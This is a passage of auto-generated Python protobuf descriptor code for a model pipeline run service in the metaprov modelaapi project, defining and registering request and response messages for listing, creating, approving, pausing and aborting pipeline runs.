_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse.items', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=466,
serialized_end=592,
)
_MODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='ModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=594,
serialized_end=620,
)
_CREATEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='CreateModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest.item', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=622,
serialized_end=743,
)
_CREATEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='CreateModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=745,
serialized_end=777,
)
_UPDATEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='UpdateModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest.item', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=779,
serialized_end=900,
)
_UPDATEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='UpdateModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=902,
serialized_end=934,
)
_GETMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='GetModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=936,
serialized_end=997,
)
_GETMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='GetModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse.item', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='yaml', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse.yaml', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1000,
serialized_end=1133,
)
_DELETEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='DeleteModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1135,
serialized_end=1199,
)
_DELETEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='DeleteModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1201,
serialized_end=1233,
)
_APPROVEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='ApproveModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stage', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.stage', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='account', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest.account', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1235,
serialized_end=1332,
)
_APPROVEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='ApproveModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1334,
serialized_end=1367,
)
_DENYMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='DenyModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stage', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.stage', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='account', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest.account', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1369,
serialized_end=1463,
)
_DENYMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='DenyModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1465,
serialized_end=1495,
)
_PAUSEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='PauseModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1497,
serialized_end=1528,
)
_PAUSEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='PauseModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1530,
serialized_end=1593,
)
_RESUMEMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='ResumeModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1595,
serialized_end=1627,
)
_RESUMEMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='ResumeModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1629,
serialized_end=1693,
)
_ABORTMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='AbortModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1695,
serialized_end=1726,
)
_ABORTMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='AbortModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1728,
serialized_end=1791,
)
_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY.containing_type = _LISTMODELPIPELINERUNSREQUEST
_LISTMODELPIPELINERUNSREQUEST.fields_by_name['labels'].message_type = _LISTMODELPIPELINERUNSREQUEST_LABELSENTRY
_LISTMODELPIPELINERUNSRESPONSE.fields_by_name['items'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUNLIST
_CREATEMODELPIPELINERUNREQUEST.fields_by_name['item'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUN
_UPDATEMODELPIPELINERUNREQUEST.fields_by_name['item'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUN
_GETMODELPIPELINERUNRESPONSE.fields_by_name['item'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUN
DESCRIPTOR.message_types_by_name['ListModelPipelineRunsRequest'] = _LISTMODELPIPELINERUNSREQUEST
DESCRIPTOR.message_types_by_name['ListModelPipelineRunsResponse'] = _LISTMODELPIPELINERUNSRESPONSE
DESCRIPTOR.message_types_by_name['ModelPipelineRunResponse'] = _MODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['CreateModelPipelineRunRequest'] = _CREATEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['CreateModelPipelineRunResponse'] = _CREATEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['UpdateModelPipelineRunRequest'] = _UPDATEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['UpdateModelPipelineRunResponse'] = _UPDATEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['GetModelPipelineRunRequest'] = _GETMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['GetModelPipelineRunResponse'] = _GETMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['DeleteModelPipelineRunRequest'] = _DELETEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['DeleteModelPipelineRunResponse'] = _DELETEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['ApproveModelPipelineRunRequest'] = _APPROVEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['ApproveModelPipelineRunResponse'] = _APPROVEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['DenyModelPipelineRunRequest'] = _DENYMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['DenyModelPipelineRunResponse'] = _DENYMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['PauseModelPipelineRunResponse'] = _PAUSEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['PauseModelPipelineRunRequest'] = _PAUSEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['ResumeModelPipelineRunResponse'] = _RESUMEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['ResumeModelPipelineRunRequest'] = _RESUMEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['AbortModelPipelineRunResponse'] = _ABORTMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['AbortModelPipelineRunRequest'] = _ABORTMODELPIPELINERUNREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ListModelPipelineRunsRequest = _reflection.GeneratedProtocolMessageType('ListModelPipelineRunsRequest', (_message.Message,), {
'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
'DESCRIPTOR' : _LISTMODELPIPELINERUNSREQUEST_LABELSENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry)
})
,
'DESCRIPTOR' : _LISTMODELPIPELINERUNSREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest)
})
_sym_db.RegisterMessage(ListModelPipelineRunsRequest)
_sym_db.RegisterMessage(ListModelPipelineRunsRequest.LabelsEntry)
ListModelPipelineRunsResponse = _reflection.GeneratedProtocolMessageType('ListModelPipelineRunsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTMODELPIPELINERUNSRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse)
})
_sym_db.RegisterMessage(ListModelPipelineRunsResponse)
ModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('ModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _MODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunResponse)
})
_sym_db.RegisterMessage(ModelPipelineRunResponse)
CreateModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('CreateModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest)
})
_sym_db.RegisterMessage(CreateModelPipelineRunRequest)
CreateModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('CreateModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _CREATEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunResponse)
})
_sym_db.RegisterMessage(CreateModelPipelineRunResponse)
UpdateModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('UpdateModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest)
})
_sym_db.RegisterMessage(UpdateModelPipelineRunRequest)
UpdateModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('UpdateModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunResponse)
})
_sym_db.RegisterMessage(UpdateModelPipelineRunResponse)
GetModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('GetModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _GETMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest)
})
_sym_db.RegisterMessage(GetModelPipelineRunRequest)
GetModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('GetModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _GETMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse)
})
_sym_db.RegisterMessage(GetModelPipelineRunResponse)
DeleteModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('DeleteModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest)
})
_sym_db.RegisterMessage(DeleteModelPipelineRunRequest)
DeleteModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('DeleteModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _DELETEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunResponse)
})
_sym_db.RegisterMessage(DeleteModelPipelineRunResponse)
ApproveModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('ApproveModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _APPROVEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest)
})
_sym_db.RegisterMessage(ApproveModelPipelineRunRequest)
ApproveModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('ApproveModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _APPROVEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunResponse)
})
_sym_db.RegisterMessage(ApproveModelPipelineRunResponse)
DenyModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('DenyModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _DENYMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest)
})
_sym_db.RegisterMessage(DenyModelPipelineRunRequest)
DenyModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('DenyModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _DENYMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunResponse)
})
_sym_db.RegisterMessage(DenyModelPipelineRunResponse)
